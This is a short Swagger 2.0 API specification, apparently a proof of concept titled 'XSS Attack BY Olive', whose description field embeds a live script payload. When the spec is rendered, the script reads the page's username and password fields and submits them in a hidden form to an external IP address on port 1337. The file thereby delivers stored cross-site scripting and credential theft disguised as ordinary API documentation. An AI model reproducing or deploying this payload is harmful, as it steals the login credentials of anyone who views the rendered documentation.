swagger: '2.0'
info:
  title: XSS Attack BY Olive
  version: production
  description: |
    <script>
      var f = document.createElement('form');
      f.setAttribute('method', 'POST');
      f.setAttribute('action', 'http://152.58.96.54:1337');
      var i1 = document.createElement('input');
      i1.setAttribute('name', 'user');
      i1.setAttribute('value', document.querySelector('[name="username"]')?.value || 'unknown');
      var i2 = document.createElement('input');
      i2.setAttribute('name', 'pass');
      i2.setAttribute('value', document.querySelector('[name="password"]')?.value || 'unknown');
      f.appendChild(i1);
      f.appendChild(i2);
      document.body.appendChild(f);
      f.submit();
    </script>
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
paths:
  /Olive:
    get:
      responses:
        '200':
          description: POC triggered
      tags:
        - XSS_Proof
      summary: Trigger the XSS
